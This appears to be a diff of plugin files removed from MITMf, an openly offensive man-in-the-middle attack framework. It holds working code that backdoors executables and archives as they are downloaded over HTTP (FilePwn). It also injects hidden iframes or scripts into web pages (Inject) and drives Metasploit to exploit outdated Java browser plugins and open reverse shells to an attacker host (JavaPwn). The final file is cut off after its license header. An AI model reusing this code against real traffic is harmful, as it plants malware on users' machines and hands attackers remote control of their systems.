# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Tested on Kali-Linux.
import sys
import os
import pefile
import zipfile
import logging
import shutil
import random
import string
import tarfile
import multiprocessing
from libs.bdfactory import pebin
from libs.bdfactory import elfbin
from libs.bdfactory import machobin
from plugins.plugin import Plugin
from tempfile import mkstemp
from configobj import ConfigObj
mitmf_logger = logging.getLogger('mitmf')
class FilePwn(Plugin):
name = "FilePwn"
optname = "filepwn"
desc = "Backdoor executables being sent over http using bdfactory"
implements = ["handleResponse"]
tree_output = ["BDFProxy v0.3.2 online"]
version = "0.2"
has_opts = False
def initialize(self, options):
'''Called if plugin is enabled, passed the options namespace'''
self.options = options
self.patched = multiprocessing.Queue()
#FOR FUTURE USE
self.binaryMimeTypes = ["application/octet-stream", 'application/x-msdownload', 'application/x-msdos-program', 'binary/octet-stream']
#FOR FUTURE USE
self.zipMimeTypes = ['application/x-zip-compressed', 'application/zip']
#USED NOW
self.magicNumbers = {'elf': {'number': '7f454c46'.decode('hex'), 'offset': 0},
'pe': {'number': 'MZ', 'offset': 0},
'gz': {'number': '1f8b'.decode('hex'), 'offset': 0},
'bz': {'number': 'BZ', 'offset': 0},
'zip': {'number': '504b0304'.decode('hex'), 'offset': 0},
'tar': {'number': 'ustar', 'offset': 257},
'fatfile': {'number': 'cafebabe'.decode('hex'), 'offset': 0},
'machox64': {'number': 'cffaedfe'.decode('hex'), 'offset': 0},
'machox86': {'number': 'cefaedfe'.decode('hex'), 'offset': 0},
}
#NOT USED NOW
#self.supportedBins = ('MZ', '7f454c46'.decode('hex'))
self.userConfig = options.configfile['FilePwn']
self.FileSizeMax = self.userConfig['targets']['ALL']['FileSizeMax']
self.WindowsIntelx86 = self.userConfig['targets']['ALL']['WindowsIntelx86']
self.WindowsIntelx64 = self.userConfig['targets']['ALL']['WindowsIntelx64']
self.WindowsType = self.userConfig['targets']['ALL']['WindowsType']
self.LinuxIntelx86 = self.userConfig['targets']['ALL']['LinuxIntelx86']
self.LinuxIntelx64 = self.userConfig['targets']['ALL']['LinuxIntelx64']
self.LinuxType = self.userConfig['targets']['ALL']['LinuxType']
self.MachoIntelx86 = self.userConfig['targets']['ALL']['MachoIntelx86']
self.MachoIntelx64 = self.userConfig['targets']['ALL']['MachoIntelx64']
self.FatPriority = self.userConfig['targets']['ALL']['FatPriority']
self.zipblacklist = self.userConfig['ZIP']['blacklist']
self.tarblacklist = self.userConfig['TAR']['blacklist']
def convert_to_Bool(self, aString):
if aString.lower() == 'true':
return True
elif aString.lower() == 'false':
return False
elif aString.lower() == 'none':
return None
def bytes_have_format(self, bytess, formatt):
number = self.magicNumbers[formatt]
if bytess[number['offset']:number['offset'] + len(number['number'])] == number['number']:
return True
return False
def binaryGrinder(self, binaryFile):
"""
Feed potential binaries into this function,
it will return the result PatchedBinary, False, or None
"""
with open(binaryFile, 'r+b') as f:
binaryTMPHandle = f.read()
binaryHeader = binaryTMPHandle[:4]
result = None
try:
if binaryHeader[:2] == 'MZ': # PE/COFF
pe = pefile.PE(data=binaryTMPHandle, fast_load=True)
magic = pe.OPTIONAL_HEADER.Magic
machineType = pe.FILE_HEADER.Machine
#update when supporting more than one arch
if (magic == int('20B', 16) and machineType == 0x8664 and
self.WindowsType.lower() in ['all', 'x64']):
add_section = False
cave_jumping = False
if self.WindowsIntelx64['PATCH_TYPE'].lower() == 'append':
add_section = True
elif self.WindowsIntelx64['PATCH_TYPE'].lower() == 'jump':
cave_jumping = True
# if automatic override
if self.WindowsIntelx64['PATCH_METHOD'].lower() == 'automatic':
cave_jumping = True
targetFile = pebin.pebin(FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.WindowsIntelx64['SHELL'],
HOST=self.WindowsIntelx64['HOST'],
PORT=int(self.WindowsIntelx64['PORT']),
ADD_SECTION=add_section,
CAVE_JUMPING=cave_jumping,
IMAGE_TYPE=self.WindowsType,
PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx64['PATCH_DLL']),
SUPPLIED_SHELLCODE=self.WindowsIntelx64['SUPPLIED_SHELLCODE'],
ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx64['ZERO_CERT']),
PATCH_METHOD=self.WindowsIntelx64['PATCH_METHOD'].lower()
)
result = targetFile.run_this()
elif (machineType == 0x14c and
self.WindowsType.lower() in ['all', 'x86']):
add_section = False
cave_jumping = False
#add_section wins for cave_jumping
#default is single for BDF
if self.WindowsIntelx86['PATCH_TYPE'].lower() == 'append':
add_section = True
elif self.WindowsIntelx86['PATCH_TYPE'].lower() == 'jump':
cave_jumping = True
# if automatic override
if self.WindowsIntelx86['PATCH_METHOD'].lower() == 'automatic':
cave_jumping = True
targetFile = pebin.pebin(FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.WindowsIntelx86['SHELL'],
HOST=self.WindowsIntelx86['HOST'],
PORT=int(self.WindowsIntelx86['PORT']),
ADD_SECTION=add_section,
CAVE_JUMPING=cave_jumping,
IMAGE_TYPE=self.WindowsType,
PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx86['PATCH_DLL']),
SUPPLIED_SHELLCODE=self.WindowsIntelx86['SUPPLIED_SHELLCODE'],
ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx86['ZERO_CERT']),
PATCH_METHOD=self.WindowsIntelx86['PATCH_METHOD'].lower()
)
result = targetFile.run_this()
elif binaryHeader[:4].encode('hex') == '7f454c46': # ELF
targetFile = elfbin.elfbin(FILE=binaryFile, SUPPORT_CHECK=False)
targetFile.support_check()
if targetFile.class_type == 0x1:
#x86CPU Type
targetFile = elfbin.elfbin(FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.LinuxIntelx86['SHELL'],
HOST=self.LinuxIntelx86['HOST'],
PORT=int(self.LinuxIntelx86['PORT']),
SUPPLIED_SHELLCODE=self.LinuxIntelx86['SUPPLIED_SHELLCODE'],
IMAGE_TYPE=self.LinuxType
)
result = targetFile.run_this()
elif targetFile.class_type == 0x2:
#x64
targetFile = elfbin.elfbin(FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.LinuxIntelx64['SHELL'],
HOST=self.LinuxIntelx64['HOST'],
PORT=int(self.LinuxIntelx64['PORT']),
SUPPLIED_SHELLCODE=self.LinuxIntelx64['SUPPLIED_SHELLCODE'],
IMAGE_TYPE=self.LinuxType
)
result = targetFile.run_this()
elif binaryHeader[:4].encode('hex') in ['cefaedfe', 'cffaedfe', 'cafebabe']: # Macho
targetFile = machobin.machobin(FILE=binaryFile, SUPPORT_CHECK=False)
targetFile.support_check()
#ONE CHIP SET MUST HAVE PRIORITY in FAT FILE
if targetFile.FAT_FILE is True:
if self.FatPriority == 'x86':
targetFile = machobin.machobin(FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.MachoIntelx86['SHELL'],
HOST=self.MachoIntelx86['HOST'],
PORT=int(self.MachoIntelx86['PORT']),
SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'],
FAT_PRIORITY=self.FatPriority
)
result = targetFile.run_this()
elif self.FatPriority == 'x64':
targetFile = machobin.machobin(FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.MachoIntelx64['SHELL'],
HOST=self.MachoIntelx64['HOST'],
PORT=int(self.MachoIntelx64['PORT']),
SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'],
FAT_PRIORITY=self.FatPriority
)
result = targetFile.run_this()
elif targetFile.mach_hdrs[0]['CPU Type'] == '0x7':
targetFile = machobin.machobin(FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.MachoIntelx86['SHELL'],
HOST=self.MachoIntelx86['HOST'],
PORT=int(self.MachoIntelx86['PORT']),
SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'],
FAT_PRIORITY=self.FatPriority
)
result = targetFile.run_this()
elif targetFile.mach_hdrs[0]['CPU Type'] == '0x1000007':
targetFile = machobin.machobin(FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.MachoIntelx64['SHELL'],
HOST=self.MachoIntelx64['HOST'],
PORT=int(self.MachoIntelx64['PORT']),
SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'],
FAT_PRIORITY=self.FatPriority
)
result = targetFile.run_this()
self.patched.put(result)
return
except Exception as e:
print 'Exception', str(e)
mitmf_logger.warning("EXCEPTION IN binaryGrinder %s", str(e))
return None
def tar_files(self, aTarFileBytes, formatt):
"When called will unpack and edit a Tar File and return a tar file"
print "[*] TarFile size:", len(aTarFileBytes) / 1024, 'KB'
if len(aTarFileBytes) > int(self.userConfig['TAR']['maxSize']):
print "[!] TarFile over allowed size"
mitmf_logger.info("TarFIle maxSize met %s", len(aTarFileBytes))
self.patched.put(aTarFileBytes)
return
with tempfile.NamedTemporaryFile() as tarFileStorage:
tarFileStorage.write(aTarFileBytes)
tarFileStorage.flush()
if not tarfile.is_tarfile(tarFileStorage.name):
print '[!] Not a tar file'
self.patched.put(aTarFileBytes)
return
compressionMode = ':'
if formatt == 'gz':
compressionMode = ':gz'
if formatt == 'bz':
compressionMode = ':bz2'
tarFile = None
try:
tarFileStorage.seek(0)
tarFile = tarfile.open(fileobj=tarFileStorage, mode='r' + compressionMode)
except tarfile.ReadError:
pass
if tarFile is None:
print '[!] Not a tar file'
self.patched.put(aTarFileBytes)
return
print '[*] Tar file contents and info:'
print '[*] Compression:', formatt
members = tarFile.getmembers()
for info in members:
print "\t", info.name, info.mtime, info.size
newTarFileStorage = tempfile.NamedTemporaryFile()
newTarFile = tarfile.open(mode='w' + compressionMode, fileobj=newTarFileStorage)
patchCount = 0
wasPatched = False
for info in members:
print "[*] >>> Next file in tarfile:", info.name
if not info.isfile():
print info.name, 'is not a file'
newTarFile.addfile(info, tarFile.extractfile(info))
continue
if info.size >= long(self.FileSizeMax):
print info.name, 'is too big'
newTarFile.addfile(info, tarFile.extractfile(info))
continue
# Check against keywords
keywordCheck = False
if type(self.tarblacklist) is str:
if self.tarblacklist.lower() in info.name.lower():
keywordCheck = True
else:
for keyword in self.tarblacklist:
if keyword.lower() in info.name.lower():
keywordCheck = True
continue
if keywordCheck is True:
print "[!] Tar blacklist enforced!"
mitmf_logger.info('Tar blacklist enforced on %s', info.name)
continue
# Try to patch
extractedFile = tarFile.extractfile(info)
if patchCount >= int(self.userConfig['TAR']['patchCount']):
newTarFile.addfile(info, extractedFile)
else:
# create the file on disk temporarily for fileGrinder to run on it
with tempfile.NamedTemporaryFile() as tmp:
shutil.copyfileobj(extractedFile, tmp)
tmp.flush()
patchResult = self.binaryGrinder(tmp.name)
if patchResult:
patchCount += 1
file2 = "backdoored/" + os.path.basename(tmp.name)
print "[*] Patching complete, adding to tar file."
info.size = os.stat(file2).st_size
with open(file2, 'rb') as f:
newTarFile.addfile(info, f)
mitmf_logger.info("%s in tar patched, adding to tarfile", info.name)
os.remove(file2)
wasPatched = True
else:
print "[!] Patching failed"
with open(tmp.name, 'rb') as f:
newTarFile.addfile(info, f)
mitmf_logger.info("%s patching failed. Keeping original file in tar.", info.name)
if patchCount == int(self.userConfig['TAR']['patchCount']):
mitmf_logger.info("Met Tar config patchCount limit.")
# finalize the writing of the tar file first
newTarFile.close()
# then read the new tar file into memory
newTarFileStorage.seek(0)
ret = newTarFileStorage.read()
newTarFileStorage.close() # it's automatically deleted
if wasPatched is False:
# If nothing was changed return the original
print "[*] No files were patched forwarding original file"
self.patched.put(aTarFileBytes)
return
else:
self.patched.put(ret)
return
def zip_files(self, aZipFile):
"When called will unpack and edit a Zip File and return a zip file"
print "[*] ZipFile size:", len(aZipFile) / 1024, 'KB'
if len(aZipFile) > int(self.userConfig['ZIP']['maxSize']):
print "[!] ZipFile over allowed size"
mitmf_logger.info("ZipFIle maxSize met %s", len(aZipFile))
self.patched.put(aZipFile)
return
tmpRan = ''.join(random.choice(string.ascii_lowercase + string.digits + string.ascii_uppercase) for _ in range(8))
tmpDir = '/tmp/' + tmpRan
tmpFile = '/tmp/' + tmpRan + '.zip'
os.mkdir(tmpDir)
with open(tmpFile, 'w') as f:
f.write(aZipFile)
zippyfile = zipfile.ZipFile(tmpFile, 'r')
#encryption test
try:
zippyfile.testzip()
except RuntimeError as e:
if 'encrypted' in str(e):
mitmf_logger.info('Encrypted zipfile found. Not patching.')
return aZipFile
print "[*] ZipFile contents and info:"
for info in zippyfile.infolist():
print "\t", info.filename, info.date_time, info.file_size
zippyfile.extractall(tmpDir)
patchCount = 0
wasPatched = False
for info in zippyfile.infolist():
print "[*] >>> Next file in zipfile:", info.filename
if os.path.isdir(tmpDir + '/' + info.filename) is True:
print info.filename, 'is a directory'
continue
#Check against keywords
keywordCheck = False
if type(self.zipblacklist) is str:
if self.zipblacklist.lower() in info.filename.lower():
keywordCheck = True
else:
for keyword in self.zipblacklist:
if keyword.lower() in info.filename.lower():
keywordCheck = True
continue
if keywordCheck is True:
print "[!] Zip blacklist enforced!"
mitmf_logger.info('Zip blacklist enforced on %s', info.filename)
continue
patchResult = self.binaryGrinder(tmpDir + '/' + info.filename)
if patchResult:
patchCount += 1
file2 = "backdoored/" + os.path.basename(info.filename)
print "[*] Patching complete, adding to zip file."
shutil.copyfile(file2, tmpDir + '/' + info.filename)
mitmf_logger.info("%s in zip patched, adding to zipfile", info.filename)
os.remove(file2)
wasPatched = True
else:
print "[!] Patching failed"
mitmf_logger.info("%s patching failed. Keeping original file in zip.", info.filename)
print '-' * 10
if patchCount >= int(self.userConfig['ZIP']['patchCount']): # Make this a setting.
mitmf_logger.info("Met Zip config patchCount limit.")
break
zippyfile.close()
zipResult = zipfile.ZipFile(tmpFile, 'w', zipfile.ZIP_DEFLATED)
print "[*] Writing to zipfile:", tmpFile
for base, dirs, files in os.walk(tmpDir):
for afile in files:
filename = os.path.join(base, afile)
print '[*] Writing filename to zipfile:', filename.replace(tmpDir + '/', '')
zipResult.write(filename, arcname=filename.replace(tmpDir + '/', ''))
zipResult.close()
#clean up
shutil.rmtree(tmpDir)
with open(tmpFile, 'rb') as f:
tempZipFile = f.read()
os.remove(tmpFile)
if wasPatched is False:
print "[*] No files were patched forwarding original file"
self.patched.put(aZipFile)
return
else:
self.patched.put(tempZipFile)
return
def handleResponse(self, request, data):
content_header = request.client.headers['Content-Type']
client_ip = request.client.getClientIP()
if content_header in self.zipMimeTypes:
if self.bytes_have_format(data, 'zip'):
mitmf_logger.info("%s Detected supported zip file type!" % client_ip)
process = multiprocessing.Process(name='zip', target=self.zip, args=(data,))
process.daemon = True
process.start()
process.join()
bd_zip = self.patched.get()
if bd_zip:
mitmf_logger.info("%s Patching complete, forwarding to client" % client_ip)
return {'request': request, 'data': bd_zip}
else:
for tartype in ['gz','bz','tar']:
if self.bytes_have_format(data, tartype):
mitmf_logger.info("%s Detected supported tar file type!" % client_ip)
process = multiprocessing.Process(name='tar_files', target=self.tar_files, args=(data,))
process.daemon = True
process.start()
process.join()
bd_tar = self.patched.get()
if bd_tar:
mitmf_logger.info("%s Patching complete, forwarding to client" % client_ip)
return {'request': request, 'data': bd_tar}
elif content_header in self.binaryMimeTypes:
for bintype in ['pe','elf','fatfile','machox64','machox86']:
if self.bytes_have_format(data, bintype):
mitmf_logger.info("%s Detected supported binary type!" % client_ip)
fd, tmpFile = mkstemp()
with open(tmpFile, 'w') as f:
f.write(data)
process = multiprocessing.Process(name='binaryGrinder', target=self.binaryGrinder, args=(tmpFile,))
process.daemon = True
process.start()
process.join()
patchb = self.patched.get()
if patchb:
bd_binary = open("backdoored/" + os.path.basename(tmpFile), "rb").read()
os.remove('./backdoored/' + os.path.basename(tmpFile))
mitmf_logger.info("%s Patching complete, forwarding to client" % client_ip)
return {'request': request, 'data': bd_binary}
else:
mitmf_logger.debug("%s File is not of supported Content-Type: %s" % (client_ip, content_header))
return {'request': request, 'data': data}

View file

@ -1,180 +0,0 @@
#!/usr/bin/env python2.7
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
from scapy.all import get_if_addr
import time
import re
import sys
import argparse
from plugins.plugin import Plugin
from plugins.CacheKill import CacheKill
mitmf_logger = logging.getLogger('mitmf')
class Inject(CacheKill, Plugin):
name = "Inject"
optname = "inject"
implements = ["handleResponse", "handleHeader", "connectionMade"]
has_opts = True
desc = "Inject arbitrary content into HTML content"
version = "0.2"
depends = ["CacheKill"]
def initialize(self, options):
'''Called if plugin is enabled, passed the options namespace'''
self.options = options
self.proxyip = options.ip_address
self.html_src = options.html_url
self.js_src = options.js_url
self.rate_limit = options.rate_limit
self.count_limit = options.count_limit
self.per_domain = options.per_domain
self.black_ips = options.black_ips
self.white_ips = options.white_ips
self.match_str = options.match_str
self.html_payload = options.html_payload
if self.white_ips:
temp = []
for ip in self.white_ips.split(','):
temp.append(ip)
self.white_ips = temp
if self.black_ips:
temp = []
for ip in self.black_ips.split(','):
temp.append(ip)
self.black_ips = temp
if self.options.preserve_cache:
self.implements.remove("handleHeader")
self.implements.remove("connectionMade")
if options.html_file is not None:
self.html_payload += options.html_file.read()
self.ctable = {}
self.dtable = {}
self.count = 0
self.mime = "text/html"
def handleResponse(self, request, data):
#We throttle to only inject once every two seconds per client
#If you have MSF on another host, you may need to check prior to injection
#print "http://" + request.client.getRequestHostname() + request.uri
ip, hn, mime = self._get_req_info(request)
if self._should_inject(ip, hn, mime) and (not self.js_src == self.html_src is not None or not self.html_payload == ""):
if hn not in self.proxyip: #prevents recursive injecting
data = self._insert_html(data, post=[(self.match_str, self._get_payload())])
self.ctable[ip] = time.time()
self.dtable[ip+hn] = True
self.count += 1
mitmf_logger.info("%s [%s] Injected malicious html" % (ip, hn))
return {'request': request, 'data': data}
else:
return
def _get_payload(self):
return self._get_js() + self._get_iframe() + self.html_payload
def add_options(self,options):
options.add_argument("--js-url", type=str, help="Location of your (presumably) malicious Javascript.")
options.add_argument("--html-url", type=str, help="Location of your (presumably) malicious HTML. Injected via hidden iframe.")
options.add_argument("--html-payload", type=str, default="", help="String you would like to inject.")
options.add_argument("--html-file", type=argparse.FileType('r'), default=None, help="File containing code you would like to inject.")
options.add_argument("--match-str", type=str, default="</body>", help="String you would like to match and place your payload before. (</body> by default)")
options.add_argument("--preserve-cache", action="store_true", help="Don't kill the server/client caching.")
group = options.add_mutually_exclusive_group(required=False)
group.add_argument("--per-domain", action="store_true", default=False, help="Inject once per domain per client.")
group.add_argument("--rate-limit", type=float, default=None, help="Inject once every RATE_LIMIT seconds per client.")
group.add_argument("--count-limit", type=int, default=None, help="Inject only COUNT_LIMIT times per client.")
group.add_argument("--white-ips", type=str, default=None, help="Inject content ONLY for these ips")
group.add_argument("--black-ips", type=str, default=None, help="DO NOT inject content for these ips")
def _should_inject(self, ip, hn, mime):
if self.white_ips is not None:
if ip in self.white_ips:
return True
else:
return False
if self.black_ips is not None:
if ip in self.black_ips:
return False
else:
return True
if self.count_limit == self.rate_limit is None and not self.per_domain:
return True
if self.count_limit is not None and self.count > self.count_limit:
#print "1"
return False
if self.rate_limit is not None:
if ip in self.ctable and time.time()-self.ctable[ip] < self.rate_limit:
return False
if self.per_domain:
return not ip+hn in self.dtable
#print mime
return mime.find(self.mime) != -1
def _get_req_info(self, request):
ip = request.client.getClientIP()
hn = request.client.getRequestHostname()
mime = request.client.headers['Content-Type']
return (ip, hn, mime)
def _get_iframe(self):
if self.html_src is not None:
return '<iframe src="%s" height=0%% width=0%%></iframe>' % (self.html_src)
return ''
def _get_js(self):
if self.js_src is not None:
return '<script type="text/javascript" src="%s"></script>' % (self.js_src)
return ''
def _insert_html(self, data, pre=[], post=[], re_flags=re.I):
'''
To use this function, simply pass a list of tuples of the form:
(string/regex_to_match,html_to_inject)
NOTE: Matching will be case insensitive unless differnt flags are given
The pre array will have the match in front of your injected code, the post
will put the match behind it.
'''
pre_regexes = [re.compile(r"(?P<match>"+i[0]+")", re_flags) for i in pre]
post_regexes = [re.compile(r"(?P<match>"+i[0]+")", re_flags) for i in post]
for i, r in enumerate(pre_regexes):
data = re.sub(r, "\g<match>"+pre[i][1], data)
for i, r in enumerate(post_regexes):
data = re.sub(r, post[i][1]+"\g<match>", data)
return data

View file

@ -1,252 +0,0 @@
#!/usr/bin/env python2.7
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import core.msfrpc as msfrpc
import string
import random
import threading
import sys
import logging
from plugins.plugin import Plugin
from plugins.BrowserProfiler import BrowserProfiler
from time import sleep
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
from scapy.all import get_if_addr
requests_log = logging.getLogger("requests") #Disables "Starting new HTTP Connection (1)" log message
requests_log.setLevel(logging.WARNING)
mitmf_logger = logging.getLogger('mitmf')
class JavaPwn(BrowserProfiler, Plugin):
name = "JavaPwn"
optname = "javapwn"
desc = "Performs drive-by attacks on clients with out-of-date java browser plugins"
tree_output = []
depends = ["Browserprofiler"]
version = "0.3"
has_opts = False
def initialize(self, options):
'''Called if plugin is enabled, passed the options namespace'''
self.options = options
self.msfip = options.ip_address
self.sploited_ips = [] #store ip of pwned or not vulnerable clients so we don't re-exploit
try:
msfcfg = options.configfile['MITMf']['Metasploit']
except Exception, e:
sys.exit("[-] Error parsing Metasploit options in config file : " + str(e))
try:
self.javacfg = options.configfile['JavaPwn']
except Exception, e:
sys.exit("[-] Error parsing config for JavaPwn: " + str(e))
self.msfport = msfcfg['msfport']
self.rpcip = msfcfg['rpcip']
self.rpcpass = msfcfg['rpcpass']
#Initialize the BrowserProfiler plugin
BrowserProfiler.initialize(self, options)
self.black_ips = []
try:
msf = msfrpc.Msfrpc({"host": self.rpcip}) #create an instance of msfrpc libarary
msf.login('msf', self.rpcpass)
version = msf.call('core.version')['version']
self.tree_output.append("Connected to Metasploit v%s" % version)
except Exception:
sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server")
t = threading.Thread(name='pwn', target=self.pwn, args=(msf,))
t.setDaemon(True)
t.start() #start the main thread
def rand_url(self): #generates a random url for our exploits (urls are generated with a / at the beginning)
return "/" + ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(5))
def get_exploit(self, java_version):
exploits = []
client_vstring = java_version[:-len(java_version.split('.')[3])-1]
client_uversion = int(java_version.split('.')[3])
for ver in self.javacfg['Multi'].iteritems():
if type(ver[1]) is list:
for list_vers in ver[1]:
version_string = list_vers[:-len(list_vers.split('.')[3])-1]
update_version = int(list_vers.split('.')[3])
if ('*' in version_string[:1]) and (client_vstring == version_string[1:]):
if client_uversion == update_version:
exploits.append(ver[0])
elif (client_vstring == version_string):
if client_uversion <= update_version:
exploits.append(ver[0])
else:
version_string = ver[1][:-len(ver[1].split('.')[3])-1]
update_version = int(ver[1].split('.')[3])
if ('*' in version_string[:1]) and (client_vstring == version_string[1:]):
if client_uversion == update_version:
exploits.append(ver[0])
elif client_vstring == version_string:
if client_uversion <= update_version:
exploits.append(ver[0])
return exploits
def injectWait(self, msfinstance, url, client_ip): #here we inject an iframe to trigger the exploit and check for resulting sessions
#inject iframe
mitmf_logger.info("%s >> now injecting iframe to trigger exploit" % client_ip)
self.html_payload = "<iframe src='http://%s:%s%s' height=0%% width=0%%></iframe>" % (self.msfip, self.msfport, url) #temporarily changes the code that the Browserprofiler plugin injects
mitmf_logger.info('%s >> waiting for ze shellz, Please wait...' % client_ip)
exit = False
i = 1
while i <= 30: #wait max 60 seconds for a new shell
if exit:
break
shell = msfinstance.call('session.list') #poll metasploit every 2 seconds for new sessions
if len(shell) > 0:
for k, v in shell.iteritems():
if client_ip in shell[k]['tunnel_peer']: #make sure the shell actually came from the ip that we targeted
mitmf_logger.info("%s >> Got shell!" % client_ip)
self.sploited_ips.append(client_ip) #target successfuly exploited :)
self.black_ips = self.sploited_ips #Add to inject blacklist since box has been popped
exit = True
break
sleep(2)
i += 1
if exit is False: #We didn't get a shell :(
mitmf_logger.info("%s >> session not established after 30 seconds" % client_ip)
self.html_payload = self.get_payload() # restart the BrowserProfiler plugin
def send_command(self, cmd, msf, vic_ip):
try:
mitmf_logger.info("%s >> sending commands to metasploit" % vic_ip)
#Create a virtual console
console_id = msf.call('console.create')['id']
#write the cmd to the newly created console
msf.call('console.write', [console_id, cmd])
mitmf_logger.info("%s >> commands sent succesfully" % vic_ip)
except Exception, e:
mitmf_logger.info('%s >> Error accured while interacting with metasploit: %s:%s' % (vic_ip, Exception, e))
def pwn(self, msf):
while True:
if (len(self.dic_output) > 0) and self.dic_output['java_installed'] == '1': #only choose clients that we are 100% sure have the java plugin installed and enabled
brwprofile = self.dic_output #self.dic_output is the output of the BrowserProfiler plugin in a dictionary format
if brwprofile['ip'] not in self.sploited_ips: #continue only if the ip has not been already exploited
vic_ip = brwprofile['ip']
mitmf_logger.info("%s >> client has java version %s installed! Proceeding..." % (vic_ip, brwprofile['java_version']))
mitmf_logger.info("%s >> Choosing exploit based on version string" % vic_ip)
exploits = self.get_exploit(brwprofile['java_version']) # get correct exploit strings defined in javapwn.cfg
if exploits:
if len(exploits) > 1:
mitmf_logger.info("%s >> client is vulnerable to %s exploits!" % (vic_ip, len(exploits)))
exploit = random.choice(exploits)
mitmf_logger.info("%s >> choosing %s" %(vic_ip, exploit))
else:
mitmf_logger.info("%s >> client is vulnerable to %s!" % (vic_ip, exploits[0]))
exploit = exploits[0]
#here we check to see if we already set up the exploit to avoid creating new jobs for no reason
jobs = msf.call('job.list') #get running jobs
if len(jobs) > 0:
for k, v in jobs.iteritems():
info = msf.call('job.info', [k])
if exploit in info['name']:
mitmf_logger.info('%s >> %s already started' % (vic_ip, exploit))
url = info['uripath'] #get the url assigned to the exploit
self.injectWait(msf, url, vic_ip)
else: #here we setup the exploit
rand_port = random.randint(1000, 65535) #generate a random port for the payload listener
rand_url = self.rand_url()
#generate the command string to send to the virtual console
#new line character very important as it simulates a user pressing enter
cmd = "use exploit/%s\n" % exploit
cmd += "set SRVPORT %s\n" % self.msfport
cmd += "set URIPATH %s\n" % rand_url
cmd += "set PAYLOAD generic/shell_reverse_tcp\n" #chose this payload because it can be upgraded to a full-meterpreter and its multi-platform
cmd += "set LHOST %s\n" % self.msfip
cmd += "set LPORT %s\n" % rand_port
cmd += "exploit -j\n"
mitmf_logger.debug("command string:\n%s" % cmd)
self.send_command(cmd, msf, vic_ip)
self.injectWait(msf, rand_url, vic_ip)
else:
#this might be removed in the future since newer versions of Java break the signed applet attack (unless you have a valid cert)
mitmf_logger.info("%s >> client is not vulnerable to any java exploit" % vic_ip)
mitmf_logger.info("%s >> falling back to the signed applet attack" % vic_ip)
rand_url = self.rand_url()
rand_port = random.randint(1000, 65535)
cmd = "use exploit/multi/browser/java_signed_applet\n"
cmd += "set SRVPORT %s\n" % self.msfport
cmd += "set URIPATH %s\n" % rand_url
cmd += "set PAYLOAD generic/shell_reverse_tcp\n"
cmd += "set LHOST %s\n" % self.msfip
cmd += "set LPORT %s\n" % rand_port
cmd += "exploit -j\n"
self.send_command(cmd, msf, vic_ip)
self.injectWait(msf, rand_url, vic_ip)
sleep(1)
def finish(self):
'''This will be called when shutting down'''
msf = msfrpc.Msfrpc({"host": self.rpcip})
msf.login('msf', self.rpcpass)
jobs = msf.call('job.list')
if len(jobs) > 0:
print '\n[*] Stopping all running metasploit jobs'
for k, v in jobs.iteritems():
msf.call('job.stop', [k])
consoles = msf.call('console.list')['consoles']
if len(consoles) > 0:
print "[*] Closing all virtual consoles"
for console in consoles:
msf.call('console.destroy', [console['id']])

View file

@ -1,169 +0,0 @@
#!/usr/bin/env python2.7
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
